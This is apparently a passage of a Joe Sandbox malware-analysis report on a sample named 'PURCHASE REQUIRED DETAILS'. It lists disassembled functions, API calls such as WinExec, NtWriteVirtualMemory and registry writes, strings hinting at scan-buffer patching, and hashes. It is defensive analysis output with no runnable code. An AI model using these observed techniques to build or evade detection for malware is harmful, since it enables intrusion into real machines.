                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                          • Opcode ID: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
                                                                                                                                                                                                                          • Instruction ID: ff043b244d0d6a75d583dfe07d5e3ff072b404c752661627741e3c0732ec4baa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B351EE71A212408FDB15CF6CCA84766BBE0EF4A314F9885EED648CB2C2E774C445CBA1
                                                                                                                                                                                                                          Function 02B2E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                                                                          • Opcode ID: 5495862f0f1bddf8e3835711096b5d896cf7844ecb1634bece4bf00fd7b1ad99
                                                                                                                                                                                                                          • Instruction ID: 76d3459666785fb69980c82cbbb91271009e13b4435a24c9db67cefb44b155cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5495862f0f1bddf8e3835711096b5d896cf7844ecb1634bece4bf00fd7b1ad99
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC413B75B002189FEB01EBA4D881ADEB3BAEF88700FA044B6E145E7255DA70FD098F55
                                                                                                                                                                                                                          Function 02B285BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                          • String ID: Kernel32$WinExec
                                                                                                                                                                                                                          • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                          • Opcode ID: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
                                                                                                                                                                                                                          • Instruction ID: 474f45942380282da43f5fc0f3f10ac7b2e9ad0c667e0a98645b595e1c511140
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 560181B1694314BFEB01EFA4DC01F5A77FDE709700FA084A0F908D3650DA34AD159A25
                                                                                                                                                                                                                          Function 02B285BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                          • String ID: Kernel32$WinExec
                                                                                                                                                                                                                          • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                          • Opcode ID: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
                                                                                                                                                                                                                          • Instruction ID: 78092c23edb0741e8d385a2d3ff20ef1e16d16e6999086907ed04610de41314e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF081B1694314BFEB01EFA4DC01F5A77FDE709700FA084A0F908D3650DA34AD159A25
                                                                                                                                                                                                                          Function 02B25C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25C88
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25CB6
                                                                                                                                                                                                                            • Part of subcall function 02B17D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B23900,02B25CF6,00000000,02B25D74,?,?,02B23900), ref: 02B17DAA
                                                                                                                                                                                                                            • Part of subcall function 02B17F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B23900,02B25D11,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B17FB7
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25D1B
                                                                                                                                                                                                                            • Part of subcall function 02B1A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B1C3D9,00000000,02B1C433), ref: 02B1A797
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 503785936-0
                                                                                                                                                                                                                          • Opcode ID: baf3ed8c469578cbf0b5a3d49de77a98abf575e316f9e33ab2595bd9827d2b35
                                                                                                                                                                                                                          • Instruction ID: 1e8b4b0daa47cb5162ecb49c8fec66eaa457c7880b1a38e29eadc896d460feef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baf3ed8c469578cbf0b5a3d49de77a98abf575e316f9e33ab2595bd9827d2b35
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34319570E007189FDB10EFA4C985BDEBBF6AF09700FD040A5E504AB390DB756A098FA1
                                                                                                                                                                                                                          Function 02B2F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000914,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000914,00000914,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                                                                          • Opcode ID: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
                                                                                                                                                                                                                          • Instruction ID: aaf8704048b86ca2001737db9a699a66b180aaff3b6f120fedb44d426fd9641c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E110AB1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54
                                                                                                                                                                                                                          Function 02B2F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000914,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000914,00000914,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                                                                          • Opcode ID: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
                                                                                                                                                                                                                          • Instruction ID: c583a64b6425cf91fa3f8dd343c2bc0a43ac95fed810b29f680252759cda958d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 201106B1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54
                                                                                                                                                                                                                          Function 02B1E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                                                                                          • Opcode ID: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
                                                                                                                                                                                                                          • Instruction ID: cf62b1e7ffc386619a5091bbe796d19930a87376fbd5c22f54b4b25ff03de1a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8F09660718110C7DB2A7B39AD8466D379AAF403407D094F6EC07DB155DF64CC85D762
                                                                                                                                                                                                                          Function 02B14D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 02B14D5B
                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B14D6D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 986138563-0
                                                                                                                                                                                                                          • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                                                                                          • Instruction ID: 52ec3ed92abf5c86fe2e09f386c8718117f591d01557897fc6ce4818e05abfed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE017F82152056EEF186F25DD40B3B373AEFC2741BE484E9A940CA164DB3CD840AE78
                                                                                                                                                                                                                          Function 02B270DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 02B273DA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                          • API String ID: 3341692771-2852464175
                                                                                                                                                                                                                          • Opcode ID: 944f5d6bc4815127c9b9f3be5b6a46648a0525cd707318ae2bc5a12718da4cbf
                                                                                                                                                                                                                          • Instruction ID: ffe24a56b4168493fdef9377ecc37c51d95c0c553f498a8a1f70b13c89e80fff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 944f5d6bc4815127c9b9f3be5b6a46648a0525cd707318ae2bc5a12718da4cbf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFB1E474A017189FDB14CF99D580A9DFBF2FF89314F2481A9E849AB360DB30A849DF54
                                                                                                                                                                                                                          Function 02B1E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B1E781
                                                                                                                                                                                                                            • Part of subcall function 02B1E364: VariantClear.OLEAUT32(?), ref: 02B1E373
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Variant$ClearCopy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 274517740-0
                                                                                                                                                                                                                          • Opcode ID: f7f73fb69b99b8f1f15fd7895678d08e9ea309e8c690b8822045bf0443fdd3e2
                                                                                                                                                                                                                          • Instruction ID: 31705c05396b3093132a35808ecb0407729877560101d150f040d0c1827d8464
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7f73fb69b99b8f1f15fd7895678d08e9ea309e8c690b8822045bf0443fdd3e2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C111C8307102108BE735AF29C8C8A6677DBEF8575079084E6ED4B8F215DB30EC41DB62
                                                                                                                                                                                                                          Function 02B1E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1927566239-0
                                                                                                                                                                                                                          • Opcode ID: 9185018459b088728cad0744549f11178f8f9b77ae34eac6703455c8184e4730
                                                                                                                                                                                                                          • Instruction ID: aac2e1a7479b28b3d4be163968fb7e115db2a87ac9fdc6a70b521e5dc32b1f5b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9185018459b088728cad0744549f11178f8f9b77ae34eac6703455c8184e4730
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38317171A00209AFDB14DFA8D886AAE77F8EB0C304F8844E5FD09D7250D734EA50CBA5
                                                                                                                                                                                                                          Function 02B289D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                            • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                                                                                                                            • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
